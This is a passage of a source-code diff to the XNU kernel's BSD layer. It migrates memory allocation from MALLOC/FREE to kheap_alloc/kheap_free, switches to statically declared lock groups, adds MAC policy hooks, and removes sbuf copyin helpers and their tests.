M_NOWAIT : M_WAITOK; - MALLOC(mca_dump_buf, char *, DUMP_MCA_BUF_SIZE, M_TEMP, - malloc_wait | M_ZERO); - if (mca_dump_buf == NULL) { - return NULL; - } - } - - buf = zalloc(mcache_zone); + buf = zalloc_flags(mcache_zone, Z_WAITOK | Z_ZERO); if (buf == NULL) { goto fail; } - bzero(buf, MCACHE_ALLOC_SIZE); - /* * In case we didn't get a cache-aligned memory, round it up * accordingly. This is needed in order to get the rest of @@ -358,10 +334,7 @@ mcache_create_common(const char *name, size_t bufsize, size_t align, (void) snprintf(cp->mc_name, sizeof(cp->mc_name), "mcache.%s", name); (void) snprintf(lck_name, sizeof(lck_name), "%s.cpu", cp->mc_name); - cp->mc_cpu_lock_grp_attr = lck_grp_attr_alloc_init(); - cp->mc_cpu_lock_grp = lck_grp_alloc_init(lck_name, - cp->mc_cpu_lock_grp_attr); - cp->mc_cpu_lock_attr = lck_attr_alloc_init(); + cp->mc_cpu_lock_grp = lck_grp_alloc_init(lck_name, LCK_GRP_ATTR_NULL); /* * Allocation chunk size is the object's size plus any extra size @@ -383,20 +356,14 @@ mcache_create_common(const char *name, size_t bufsize, size_t align, * Initialize the bucket layer. 
*/ (void) snprintf(lck_name, sizeof(lck_name), "%s.bkt", cp->mc_name); - cp->mc_bkt_lock_grp_attr = lck_grp_attr_alloc_init(); cp->mc_bkt_lock_grp = lck_grp_alloc_init(lck_name, - cp->mc_bkt_lock_grp_attr); - cp->mc_bkt_lock_attr = lck_attr_alloc_init(); - lck_mtx_init(&cp->mc_bkt_lock, cp->mc_bkt_lock_grp, - cp->mc_bkt_lock_attr); + LCK_GRP_ATTR_NULL); + lck_mtx_init(&cp->mc_bkt_lock, cp->mc_bkt_lock_grp, LCK_ATTR_NULL); (void) snprintf(lck_name, sizeof(lck_name), "%s.sync", cp->mc_name); - cp->mc_sync_lock_grp_attr = lck_grp_attr_alloc_init(); cp->mc_sync_lock_grp = lck_grp_alloc_init(lck_name, - cp->mc_sync_lock_grp_attr); - cp->mc_sync_lock_attr = lck_attr_alloc_init(); - lck_mtx_init(&cp->mc_sync_lock, cp->mc_sync_lock_grp, - cp->mc_sync_lock_attr); + LCK_GRP_ATTR_NULL); + lck_mtx_init(&cp->mc_sync_lock, cp->mc_sync_lock_grp, LCK_ATTR_NULL); for (btp = mcache_bkttype; chunksize <= btp->bt_minbuf; btp++) { continue; @@ -412,8 +379,7 @@ mcache_create_common(const char *name, size_t bufsize, size_t align, mcache_cpu_t *ccp = &cp->mc_cpu[c]; VERIFY(IS_P2ALIGNED(ccp, CPU_CACHE_LINE_SIZE)); - lck_mtx_init(&ccp->cc_lock, cp->mc_cpu_lock_grp, - cp->mc_cpu_lock_attr); + lck_mtx_init(&ccp->cc_lock, cp->mc_cpu_lock_grp, LCK_ATTR_NULL); ccp->cc_objs = -1; ccp->cc_pobjs = -1; } @@ -896,17 +862,9 @@ mcache_destroy(mcache_t *cp) cp->mc_slab_free = NULL; cp->mc_slab_audit = NULL; - lck_attr_free(cp->mc_bkt_lock_attr); lck_grp_free(cp->mc_bkt_lock_grp); - lck_grp_attr_free(cp->mc_bkt_lock_grp_attr); - - lck_attr_free(cp->mc_cpu_lock_attr); lck_grp_free(cp->mc_cpu_lock_grp); - lck_grp_attr_free(cp->mc_cpu_lock_grp_attr); - - lck_attr_free(cp->mc_sync_lock_attr); lck_grp_free(cp->mc_sync_lock_grp); - lck_grp_attr_free(cp->mc_sync_lock_grp_attr); /* * TODO: We need to destroy the zone here, but cannot do it @@ -1358,7 +1316,7 @@ mcache_cache_update(mcache_t *cp) int need_bkt_resize = 0; int need_bkt_reenable = 0; - lck_mtx_assert(mcache_llock, LCK_MTX_ASSERT_OWNED); + 
lck_mtx_assert(&mcache_llock, LCK_MTX_ASSERT_OWNED); mcache_bkt_ws_update(cp); @@ -1645,13 +1603,9 @@ mcache_audit_free_verify_set(mcache_audit_t *mca, void *base, size_t offset, #define MCA_TRN_PREV ((mca->mca_next_trn + mca_trn_max - 1) % mca_trn_max) __private_extern__ char * -mcache_dump_mca(mcache_audit_t *mca) +mcache_dump_mca(char buf[static DUMP_MCA_BUF_SIZE], mcache_audit_t *mca) { - if (mca_dump_buf == NULL) { - return NULL; - } - - snprintf(mca_dump_buf, DUMP_MCA_BUF_SIZE, + snprintf(buf, DUMP_MCA_BUF_SIZE, "mca %p: addr %p, cache %p (%s) nxttrn %d\n" DUMP_TRN_FMT() DUMP_TRN_FMT(), @@ -1663,13 +1617,15 @@ mcache_dump_mca(mcache_audit_t *mca) DUMP_TRN_FIELDS("last", MCA_TRN_LAST), DUMP_TRN_FIELDS("previous", MCA_TRN_PREV)); - return mca_dump_buf; + return buf; } __private_extern__ void mcache_audit_panic(mcache_audit_t *mca, void *addr, size_t offset, int64_t expected, int64_t got) { + char buf[DUMP_MCA_BUF_SIZE]; + if (mca == NULL) { panic("mcache_audit: buffer %p modified after free at " "offset 0x%lx (0x%llx instead of 0x%llx)\n", addr, @@ -1680,7 +1636,7 @@ mcache_audit_panic(mcache_audit_t *mca, void *addr, size_t offset, panic("mcache_audit: buffer %p modified after free at offset 0x%lx " "(0x%llx instead of 0x%llx)\n%s\n", - addr, offset, got, expected, mcache_dump_mca(mca)); + addr, offset, got, expected, mcache_dump_mca(buf, mca)); /* NOTREACHED */ __builtin_unreachable(); } diff --git a/bsd/kern/policy_check.c b/bsd/kern/policy_check.c index 7621bdec3..89a714051 100644 --- a/bsd/kern/policy_check.c +++ b/bsd/kern/policy_check.c @@ -121,7 +121,7 @@ common_hook(void) return rv; } -#if (MAC_POLICY_OPS_VERSION != 69) +#if (MAC_POLICY_OPS_VERSION != 74) # error "struct mac_policy_ops doesn't match definition in mac_policy.h" #endif /* @@ -238,9 +238,9 @@ const static struct mac_policy_ops policy_ops = { CHECK_SET_HOOK(mount_label_init) CHECK_SET_HOOK(mount_label_internalize) - .mpo_reserved38 = (mpo_reserved_hook_t *)common_hook, - .mpo_reserved39 = 
(mpo_reserved_hook_t *)common_hook, - .mpo_reserved40 = (mpo_reserved_hook_t *)common_hook, + CHECK_SET_HOOK(proc_check_expose_task_with_flavor) + CHECK_SET_HOOK(proc_check_get_task_with_flavor) + CHECK_SET_HOOK(proc_check_task_id_token_get_task) CHECK_SET_HOOK(pipe_check_ioctl) CHECK_SET_HOOK(pipe_check_kqfilter) @@ -339,8 +339,8 @@ const static struct mac_policy_ops policy_ops = { CHECK_SET_HOOK(socket_check_setsockopt) CHECK_SET_HOOK(socket_check_getsockopt) - .mpo_reserved50 = (mpo_reserved_hook_t *)common_hook, - .mpo_reserved51 = (mpo_reserved_hook_t *)common_hook, + CHECK_SET_HOOK(proc_check_get_movable_control_port) + CHECK_SET_HOOK(proc_check_dyld_process_info_notify_register) .mpo_reserved52 = (mpo_reserved_hook_t *)common_hook, .mpo_reserved53 = (mpo_reserved_hook_t *)common_hook, .mpo_reserved54 = (mpo_reserved_hook_t *)common_hook, @@ -351,7 +351,8 @@ const static struct mac_policy_ops policy_ops = { .mpo_reserved59 = (mpo_reserved_hook_t *)common_hook, .mpo_reserved60 = (mpo_reserved_hook_t *)common_hook, .mpo_reserved61 = (mpo_reserved_hook_t *)common_hook, - .mpo_reserved62 = (mpo_reserved_hook_t *)common_hook, + + CHECK_SET_HOOK(iokit_check_open_service) CHECK_SET_HOOK(system_check_acct) CHECK_SET_HOOK(system_check_audit) diff --git a/bsd/kern/posix_sem.c b/bsd/kern/posix_sem.c index 38106d043..3b5fc195a 100644 --- a/bsd/kern/posix_sem.c +++ b/bsd/kern/posix_sem.c @@ -181,13 +181,11 @@ static const struct fileops psemops = { .fo_kqfilter = fo_no_kqfilter, }; -static lck_grp_t *psx_sem_subsys_lck_grp; -static lck_grp_attr_t *psx_sem_subsys_lck_grp_attr; -static lck_attr_t *psx_sem_subsys_lck_attr; -static lck_mtx_t psx_sem_subsys_mutex; +static LCK_GRP_DECLARE(psx_sem_subsys_lck_grp, "posix semaphores"); +static LCK_MTX_DECLARE(psx_sem_subsys_mutex, &psx_sem_subsys_lck_grp); -#define PSEM_SUBSYS_LOCK() lck_mtx_lock(& psx_sem_subsys_mutex) -#define PSEM_SUBSYS_UNLOCK() lck_mtx_unlock(& psx_sem_subsys_mutex) +#define PSEM_SUBSYS_LOCK() 
lck_mtx_lock(&psx_sem_subsys_mutex) +#define PSEM_SUBSYS_UNLOCK() lck_mtx_unlock(&psx_sem_subsys_mutex) #define PSEM_SUBSYS_ASSERT_HELD() LCK_MTX_ASSERT(&psx_sem_subsys_mutex, LCK_MTX_ASSERT_OWNED) @@ -195,19 +193,6 @@ static int psem_cache_add(struct pseminfo *psemp, struct psemname *pnp, struct p static void psem_cache_delete(struct psemcache *pcp); int psem_cache_purge_all(proc_t); - -/* Initialize the mutex governing access to the posix sem subsystem */ -__private_extern__ void -psem_lock_init( void ) -{ - psx_sem_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - psx_sem_subsys_lck_grp = lck_grp_alloc_init("posix shared memory", psx_sem_subsys_lck_grp_attr); - - psx_sem_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&psx_sem_subsys_mutex, psx_sem_subsys_lck_grp, psx_sem_subsys_lck_attr); -} - /* * Lookup an entry in the cache * @@ -470,13 +455,13 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) * allowed and the one at the front of the LRU list is in use. * Otherwise we use the one at the front of the LRU list. */ - MALLOC(pcp, struct psemcache *, sizeof(struct psemcache), M_SHM, M_WAITOK | M_ZERO); + pcp = kheap_alloc(KM_SHM, sizeof(struct psemcache), Z_WAITOK | Z_ZERO); if (pcp == PSEMCACHE_NULL) { error = ENOMEM; goto bad; } - MALLOC(new_pinfo, struct pseminfo *, sizeof(struct pseminfo), M_SHM, M_WAITOK | M_ZERO); + new_pinfo = kheap_alloc(KM_SHM, sizeof(struct pseminfo), Z_WAITOK | Z_ZERO); if (new_pinfo == NULL) { error = ENOSPC; goto bad; @@ -517,7 +502,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) } } - MALLOC(new_pnode, struct psemnode *, sizeof(struct psemnode), M_SHM, M_WAITOK | M_ZERO); + new_pnode = kheap_alloc(KM_SHM, sizeof(struct psemnode), Z_WAITOK | Z_ZERO); if (new_pnode == NULL) { error = ENOSPC; goto bad; @@ -616,7 +601,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) * new . and we must free them. 
*/ if (incache) { - FREE(pcp, M_SHM); + kheap_free(KM_SHM, pcp, sizeof(struct psemcache)); pcp = PSEMCACHE_NULL; if (new_pinfo != PSEMINFO_NULL) { /* return value ignored - we can't _not_ do this */ @@ -624,7 +609,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) #if CONFIG_MACF mac_posixsem_label_destroy(new_pinfo); #endif - FREE(new_pinfo, M_SHM); + kheap_free(KM_SHM, new_pinfo, sizeof(struct pseminfo)); new_pinfo = PSEMINFO_NULL; } } @@ -644,13 +629,9 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) bad_locked: PSEM_SUBSYS_UNLOCK(); bad: - if (pcp != PSEMCACHE_NULL) { - FREE(pcp, M_SHM); - } + kheap_free(KM_SHM, pcp, sizeof(struct psemcache)); - if (new_pnode != PSEMNODE_NULL) { - FREE(new_pnode, M_SHM); - } + kheap_free(KM_SHM, new_pnode, sizeof(struct psemnode)); if (fp != NULL) { fp_free(p, indx, fp); @@ -669,7 +650,7 @@ bad: #if CONFIG_MACF mac_posixsem_label_destroy(new_pinfo); #endif - FREE(new_pinfo, M_SHM); + kheap_free(KM_SHM, new_pinfo, sizeof(struct pseminfo)); } if (pnbuf != NULL) { @@ -720,13 +701,13 @@ psem_unlink_internal(struct pseminfo *pinfo, struct psemcache *pcache) if (!pinfo->psem_usecount) { psem_delete(pinfo); - FREE(pinfo, M_SHM); + kheap_free(KM_SHM, pinfo, sizeof(struct pseminfo)); } else { pinfo->psem_flags |= PSEM_REMOVED; } psem_cache_delete(pcache); - FREE(pcache, M_SHM); + kheap_free(KM_SHM, pcache, sizeof(struct psemcache)); return 0; } @@ -1045,12 +1026,12 @@ psem_close(struct psemnode *pnode) PSEM_SUBSYS_UNLOCK(); /* lock dropped as only semaphore is destroyed here */ error = psem_delete(pinfo); - FREE(pinfo, M_SHM); + kheap_free(KM_SHM, pinfo, sizeof(struct pseminfo)); } else { PSEM_SUBSYS_UNLOCK(); } /* subsystem lock is dropped when we get here */ - FREE(pnode, M_SHM); + kheap_free(KM_SHM, pnode, sizeof(struct psemnode)); return error; } diff --git a/bsd/kern/posix_shm.c b/bsd/kern/posix_shm.c index bffc46999..4f22edd28 100644 --- a/bsd/kern/posix_shm.c +++ b/bsd/kern/posix_shm.c @@ 
-81,7 +81,6 @@ #include #include #include -#include #include #include @@ -204,28 +203,13 @@ static const struct fileops pshmops = { /* * Everything here is protected by a single mutex. */ -static lck_grp_t *psx_shm_subsys_lck_grp; -static lck_grp_attr_t *psx_shm_subsys_lck_grp_attr; -static lck_attr_t *psx_shm_subsys_lck_attr; -static lck_mtx_t psx_shm_subsys_mutex; +static LCK_GRP_DECLARE(psx_shm_subsys_lck_grp, "posix shared memory"); +static LCK_MTX_DECLARE(psx_shm_subsys_mutex, &psx_shm_subsys_lck_grp); #define PSHM_SUBSYS_LOCK() lck_mtx_lock(& psx_shm_subsys_mutex) #define PSHM_SUBSYS_UNLOCK() lck_mtx_unlock(& psx_shm_subsys_mutex) #define PSHM_SUBSYS_ASSERT_HELD() LCK_MTX_ASSERT(&psx_shm_subsys_mutex, LCK_MTX_ASSERT_OWNED) - -__private_extern__ void -pshm_lock_init( void ) -{ - psx_shm_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - psx_shm_subsys_lck_grp = - lck_grp_alloc_init("posix shared memory", psx_shm_subsys_lck_grp_attr); - - psx_shm_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&psx_shm_subsys_mutex, psx_shm_subsys_lck_grp, psx_shm_subsys_lck_attr); -} - /* * Lookup an entry in the cache. Only the name is used from "look". */ @@ -358,7 +342,7 @@ shm_open(proc_t p, struct shm_open_args *uap, int32_t *retval) * Allocate data structures we need. We parse the userspace name into * a pshm_info_t, even when we don't need to O_CREAT. 
*/ - MALLOC(new_pinfo, pshm_info_t *, sizeof(pshm_info_t), M_SHM, M_WAITOK | M_ZERO); + new_pinfo = kheap_alloc(KM_SHM, sizeof(pshm_info_t), Z_WAITOK | Z_ZERO); if (new_pinfo == NULL) { error = ENOSPC; goto bad; @@ -392,7 +376,8 @@ shm_open(proc_t p, struct shm_open_args *uap, int32_t *retval) /* * Will need a new pnode for the file pointer */ - MALLOC(new_pnode, pshmnode_t *, sizeof(pshmnode_t), M_SHM, M_WAITOK | M_ZERO); + new_pnode = kheap_alloc(KM_SHM, sizeof(pshmnode_t), + Z_WAITOK | Z_ZERO); if (new_pnode == NULL) { error = ENOSPC; goto bad; @@ -516,9 +501,7 @@ bad: /* * Delete any allocated unused data structures. */ - if (new_pnode != NULL) { - FREE(new_pnode, M_SHM); - } + kheap_free(KM_SHM, new_pnode, sizeof(pshmnode_t)); if (fp != NULL) { fp_free(p, indx, fp); @@ -531,7 +514,7 @@ done: mac_posixshm_label_destroy(&new_pinfo->pshm_hdr); } #endif - FREE(new_pinfo, M_SHM); + kheap_free(KM_SHM, new_pinfo, sizeof(pshm_info_t)); } return error; } @@ -628,7 +611,7 @@ pshm_truncate( } /* get a list entry to track the memory object */ - MALLOC(pshmobj, pshm_mobj_t *, sizeof(pshm_mobj_t), M_SHM, M_WAITOK); + pshmobj = kheap_alloc(KM_SHM, sizeof(pshm_mobj_t), Z_WAITOK); if (pshmobj == NULL) { kret = KERN_NO_SPACE; mach_memory_entry_port_release(mem_object); @@ -666,7 +649,7 @@ out: SLIST_REMOVE_HEAD(&pinfo->pshm_mobjs, pshmo_next); PSHM_SUBSYS_UNLOCK(); mach_memory_entry_port_release(pshmobj->pshmo_memobject); - FREE(pshmobj, M_SHM); + kheap_free(KM_SHM, pshmobj, sizeof(pshm_mobj_t)); PSHM_SUBSYS_LOCK(); } pinfo->pshm_flags &= ~PSHM_ALLOCATING; @@ -987,7 +970,8 @@ shm_unlink(proc_t p, struct shm_unlink_args *uap, __unused int32_t *retval) /* * Get the name from user args. 
*/ - MALLOC(name_pinfo, pshm_info_t *, sizeof(pshm_info_t), M_SHM, M_WAITOK | M_ZERO); + name_pinfo = kheap_alloc(KHEAP_TEMP, sizeof(pshm_info_t), + Z_WAITOK | Z_ZERO); if (name_pinfo == NULL) { error = ENOSPC; goto bad; @@ -1031,9 +1015,7 @@ shm_unlink(proc_t p, struct shm_unlink_args *uap, __unused int32_t *retval) bad_unlock: PSHM_SUBSYS_UNLOCK(); bad: - if (name_pinfo != NULL) { - FREE(name_pinfo, M_SHM); - } + kheap_free(KHEAP_TEMP, name_pinfo, sizeof(pshm_info_t)); return error; } @@ -1080,11 +1062,11 @@ pshm_deref(pshm_info_t *pinfo) while ((pshmobj = SLIST_FIRST(&pinfo->pshm_mobjs)) != NULL) { SLIST_REMOVE_HEAD(&pinfo->pshm_mobjs, pshmo_next); mach_memory_entry_port_release(pshmobj->pshmo_memobject); - FREE(pshmobj, M_SHM); + kheap_free(KM_SHM, pshmobj, sizeof(pshm_mobj_t)); } /* free the pinfo itself */ - FREE(pinfo, M_SHM); + kheap_free(KM_SHM, pinfo, sizeof(pshm_info_t)); PSHM_SUBSYS_LOCK(); } @@ -1110,9 +1092,7 @@ pshm_closefile(struct fileglob *fg, __unused vfs_context_t ctx) } PSHM_SUBSYS_UNLOCK(); - if (pnode != NULL) { - FREE(pnode, M_SHM); - } + kheap_free(KM_SHM, pnode, sizeof(pshmnode_t)); return error; } diff --git a/bsd/kern/proc_uuid_policy.c b/bsd/kern/proc_uuid_policy.c index 04d1aeda4..3d38327c9 100644 --- a/bsd/kern/proc_uuid_policy.c +++ b/bsd/kern/proc_uuid_policy.c @@ -49,10 +49,10 @@ #define dprintf(...) 
do { } while(0) #endif -static lck_grp_attr_t *proc_uuid_policy_subsys_lck_grp_attr; -static lck_grp_t *proc_uuid_policy_subsys_lck_grp; -static lck_attr_t *proc_uuid_policy_subsys_lck_attr; -static lck_mtx_t proc_uuid_policy_subsys_mutex; +static LCK_GRP_DECLARE(proc_uuid_policy_subsys_lck_grp, + "proc_uuid_policy_subsys_lock"); +static LCK_MTX_DECLARE(proc_uuid_policy_subsys_mutex, + &proc_uuid_policy_subsys_lck_grp); #define PROC_UUID_POLICY_SUBSYS_LOCK() lck_mtx_lock(&proc_uuid_policy_subsys_mutex) #define PROC_UUID_POLICY_SUBSYS_UNLOCK() lck_mtx_unlock(&proc_uuid_policy_subsys_mutex) @@ -85,6 +85,12 @@ struct proc_uuid_policy_entry { uint32_t flags; /* policy flag for that UUID */ }; +/* + * If you need accounting for KM_PROC_UUID_POLICY consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_PROC_UUID_POLICY KHEAP_DEFAULT + static int proc_uuid_policy_insert(uuid_t uuid, uint32_t flags); @@ -103,11 +109,6 @@ proc_uuid_policy_clear(uint32_t flags); void proc_uuid_policy_init(void) { - proc_uuid_policy_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - proc_uuid_policy_subsys_lck_grp = lck_grp_alloc_init("proc_uuid_policy_subsys_lock", proc_uuid_policy_subsys_lck_grp_attr); - proc_uuid_policy_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&proc_uuid_policy_subsys_mutex, proc_uuid_policy_subsys_lck_grp, proc_uuid_policy_subsys_lck_attr); - proc_uuid_policy_hashtbl = hashinit(PROC_UUID_POLICY_HASH_SIZE, M_PROC_UUID_POLICY, &proc_uuid_policy_hash_mask); proc_uuid_policy_table_gencount = 1; proc_uuid_policy_count = 0; @@ -128,7 +129,8 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags) return EINVAL; } - MALLOC(entry, struct proc_uuid_policy_entry *, sizeof(*entry), M_PROC_UUID_POLICY, M_WAITOK | M_ZERO); + entry = kheap_alloc(KM_PROC_UUID_POLICY, sizeof(struct proc_uuid_policy_entry), + Z_WAITOK | Z_ZERO); memcpy(entry->uuid, uuid, sizeof(uuid_t)); entry->flags = flags; @@ -140,7 +142,7 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t 
flags) /* The UUID is already in the list. Update the flags. */ foundentry->flags |= flags; error = 0; - FREE(entry, M_PROC_UUID_POLICY); + kheap_free(KM_PROC_UUID_POLICY, entry, sizeof(struct proc_uuid_policy_entry)); entry = NULL; BUMP_PROC_UUID_POLICY_GENERATION_COUNT(); } else { @@ -158,7 +160,7 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags) PROC_UUID_POLICY_SUBSYS_UNLOCK(); if (error) { - FREE(entry, M_PROC_UUID_POLICY); + kheap_free(KM_PROC_UUID_POLICY, entry, sizeof(struct proc_uuid_policy_entry)); dprintf("Failed to insert proc uuid policy (%s,0x%08x), table full\n", uuidstr, flags); } else { dprintf("Inserted proc uuid policy (%s,0x%08x)\n", uuidstr, flags); @@ -222,7 +224,7 @@ proc_uuid_policy_remove(uuid_t uuid, uint32_t flags) /* If we had found a pre-existing entry, deallocate its memory now */ if (delentry && should_delete) { - FREE(delentry, M_PROC_UUID_POLICY); + kheap_free(KM_PROC_UUID_POLICY, delentry, sizeof(struct proc_uuid_policy_entry)); } if (error) { @@ -332,7 +334,8 @@ proc_uuid_policy_clear(uint32_t flags) /* Memory deallocation happens after the hash lock is dropped */ LIST_FOREACH_SAFE(searchentry, &deletehead, entries, tmpentry) { LIST_REMOVE(searchentry, entries); - FREE(searchentry, M_PROC_UUID_POLICY); + kheap_free(KM_PROC_UUID_POLICY, searchentry, + sizeof(struct proc_uuid_policy_entry)); } dprintf("Clearing proc uuid policy table\n"); diff --git a/bsd/kern/subr_eventhandler.c b/bsd/kern/subr_eventhandler.c index d7f3f5cbd..167a99bef 100644 --- a/bsd/kern/subr_eventhandler.c +++ b/bsd/kern/subr_eventhandler.c @@ -65,8 +65,6 @@ int evh_debug = 0; -MALLOC_DEFINE(M_EVENTHANDLER, "eventhandler", "Event handler records"); - SYSCTL_NODE(_kern, OID_AUTO, eventhandler, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Eventhandler"); SYSCTL_INT(_kern_eventhandler, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_LOCKED, @@ -76,9 +74,7 @@ struct eventhandler_entry_arg eventhandler_entry_dummy_arg = { .ee_fm_uuid = { 0 /* List of 'slow' lists */ static struct 
eventhandler_lists_ctxt evthdlr_lists_ctxt_glb; -static lck_grp_attr_t *eventhandler_mutex_grp_attr; -static lck_grp_t *eventhandler_mutex_grp; -static lck_attr_t *eventhandler_mutex_attr; +static LCK_GRP_DECLARE(eventhandler_mutex_grp, "eventhandler"); static unsigned int eg_size; /* size of eventhandler_entry_generic */ static struct mcache *eg_cache; /* mcache for eventhandler_entry_generic */ @@ -86,9 +82,8 @@ static struct mcache *eg_cache; /* mcache for eventhandler_entry_generic */ static unsigned int el_size; /* size of eventhandler_list */ static struct mcache *el_cache; /* mcache for eventhandler_list */ -static lck_grp_attr_t *el_lock_grp_attr; -lck_grp_t *el_lock_grp; -lck_attr_t *el_lock_attr; +LCK_GRP_DECLARE(el_lock_grp, "eventhandler list"); +LCK_ATTR_DECLARE(el_lock_attr, 0, 0); struct eventhandler_entry_generic { struct eventhandler_entry ee; @@ -106,7 +101,7 @@ eventhandler_lists_ctxt_init(struct eventhandler_lists_ctxt *evthdlr_lists_ctxt) TAILQ_INIT(&evthdlr_lists_ctxt->eventhandler_lists); evthdlr_lists_ctxt->eventhandler_lists_initted = 1; lck_mtx_init(&evthdlr_lists_ctxt->eventhandler_mutex, - eventhandler_mutex_grp, eventhandler_mutex_attr); + &eventhandler_mutex_grp, LCK_ATTR_NULL); } /* @@ -115,16 +110,6 @@ eventhandler_lists_ctxt_init(struct eventhandler_lists_ctxt *evthdlr_lists_ctxt) void eventhandler_init(void) { - eventhandler_mutex_grp_attr = lck_grp_attr_alloc_init(); - eventhandler_mutex_grp = lck_grp_alloc_init("eventhandler", - eventhandler_mutex_grp_attr); - eventhandler_mutex_attr = lck_attr_alloc_init(); - - el_lock_grp_attr = lck_grp_attr_alloc_init(); - el_lock_grp = lck_grp_alloc_init("eventhandler list", - el_lock_grp_attr); - el_lock_attr = lck_attr_alloc_init(); - eventhandler_lists_ctxt_init(&evthdlr_lists_ctxt_glb); eg_size = sizeof(struct eventhandler_entry_generic); @@ -385,6 +370,6 @@ eventhandler_lists_ctxt_destroy(struct eventhandler_lists_ctxt *evthdlr_lists_ct } 
lck_mtx_unlock(&evthdlr_lists_ctxt->eventhandler_mutex); lck_mtx_destroy(&evthdlr_lists_ctxt->eventhandler_mutex, - eventhandler_mutex_grp); + &eventhandler_mutex_grp); return; } diff --git a/bsd/kern/subr_sbuf.c b/bsd/kern/subr_sbuf.c index 190485145..8196722e9 100644 --- a/bsd/kern/subr_sbuf.c +++ b/bsd/kern/subr_sbuf.c @@ -705,147 +705,6 @@ sbuf_done(struct sbuf *s) return !!SBUF_ISFINISHED(s); } -/*! - * @function sbuf_uionew - * - * @brief - * Create a new sbuf and initialize its buffer with data from the given uio. - * - * @param s - * An optional existing sbuf to initialize, or NULL to allocate a new one. - * - * @param uio - * The uio describing the data to populate the sbuf with. - * - * @param error - * An output parameter to report any error to. - * - * @returns - * The new and/or initialized sbuf, or NULL on error. The error code is - * reported back via @a error. - */ -struct sbuf * -sbuf_uionew(struct sbuf *s, struct uio *uio, int *error) -{ - int size; - - if ((user_size_t)uio_resid(uio) > INT_MAX - 1) { - *error = EINVAL; - return NULL; - } - - size = (int)uio_resid(uio); - s = sbuf_new(s, NULL, size + 1, 0); - if (s == NULL) { - *error = ENOMEM; - return NULL; - } - - *error = uiomove(s->s_buf, size, uio); - if (*error != 0) { - sbuf_delete(s); - return NULL; - } - - s->s_len = size; - *error = 0; - - return s; -} - -/*! - * @function sbuf_bcopyin - * - * @brief - * Append userland data to an sbuf. - * - * @param s - * The sbuf. - * - * @param uaddr - * The userland address of data to append to the sbuf. - * - * @param len - * The length of the data to copy from userland. - * - * @returns - * 0 on success or -1 on error. Always returns -1 if the sbuf is marked as - * overflowed. 
- */ -int -sbuf_bcopyin(struct sbuf *s, const void *uaddr, size_t len) -{ - if (SBUF_HASOVERFLOWED(s)) { - return -1; - } - - if (len == 0) { - return 0; - } - - if (-1 == sbuf_ensure_capacity(s, len)) { - SBUF_SETFLAG(s, SBUF_OVERFLOWED); - return -1; - } - - if (copyin(CAST_USER_ADDR_T(uaddr), &s->s_buf[s->s_len], len) != 0) { - return -1; - } - - s->s_len += (int)len; - return 0; -} - -/*! - * @function sbuf_copyin - * - * @brief - * Append a userland string to an sbuf. - * - * @param s - * The sbuf. - * - * @param uaddr - * The userland address of the string to append to the sbuf. - * - * @param len - * The maximum length of the string to copy. If zero, the current capacity of - * the sbuf is used. - * - * @returns - * The number of bytes copied or -1 if an error occurred. Always returns -1 if - * the sbuf is marked as overflowed. - */ -int -sbuf_copyin(struct sbuf *s, const void *uaddr, size_t len) -{ - size_t done; - - if (SBUF_HASOVERFLOWED(s)) { - return -1; - } - - if (len == 0) { - len = sbuf_capacity(s); - } else if (-1 == sbuf_ensure_capacity(s, len)) { - return -1; - } - - switch (copyinstr(CAST_USER_ADDR_T(uaddr), &s->s_buf[s->s_len], len + 1, &done)) { - case ENAMETOOLONG: - SBUF_SETFLAG(s, SBUF_OVERFLOWED); - s->s_len += done; - return -1; - case 0: - s->s_len += done - 1; - break; - default: - return -1; - } - - return (int)done; -} - #if DEBUG || DEVELOPMENT /* @@ -1932,258 +1791,6 @@ sysctl_sbuf_tests SYSCTL_HANDLER_ARGS } } - SBUF_TESTING("sbuf_uionew") - { - SBUF_SHOULD("reject residuals that are too large") - { - struct sbuf *s = NULL; - uio_t auio = NULL; - char buf[4]; - int error = 0; - - buf[0] = 'A'; - buf[1] = 'B'; - buf[2] = 'C'; - buf[3] = 'D'; - - auio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ); - uio_addiov(auio, (user_addr_t)buf, INT_MAX); - - s = sbuf_uionew(NULL, auio, &error); - SBUF_ASSERT_EQ(NULL, s); - SBUF_ASSERT_EQ(EINVAL, error); - - uio_free(auio); - } - - SBUF_SHOULD("initialize using data described by the uio") - { - 
struct sbuf *s = NULL; - uio_t auio = NULL; - char buf[4]; - int error = 0; - - buf[0] = 'A'; - buf[1] = 'B'; - buf[2] = 'C'; - buf[3] = 'D'; - - auio = uio_create(1, 0, UIO_SYSSPACE, UIO_WRITE); - uio_addiov(auio, (user_addr_t)buf, sizeof(buf)); - - s = sbuf_uionew(NULL, auio, &error); - SBUF_ASSERT_NE(NULL, s); - SBUF_ASSERT_EQ(0, error); - SBUF_ASSERT_EQ(4, s->s_len); - SBUF_ASSERT_EQ('A', s->s_buf[0]); - SBUF_ASSERT_EQ('B', s->s_buf[1]); - SBUF_ASSERT_EQ('C', s->s_buf[2]); - SBUF_ASSERT_EQ('D', s->s_buf[3]); - - sbuf_delete(s); - uio_free(auio); - } - - SBUF_SHOULD("fail gracefully for bad addresses") - { - struct sbuf *s = NULL; - uio_t auio = NULL; - int error = 0; - - auio = uio_create(1, 0, UIO_USERSPACE, UIO_WRITE); - uio_addiov(auio, (user_addr_t)0xdeadUL, 123); - - s = sbuf_uionew(NULL, auio, &error); - SBUF_ASSERT_EQ(NULL, s); - SBUF_ASSERT_NE(0, error); - - uio_free(auio); - } - } - - SBUF_TESTING("sbuf_bcopyin") - { - SBUF_SHOULD("succeed when len is zero") 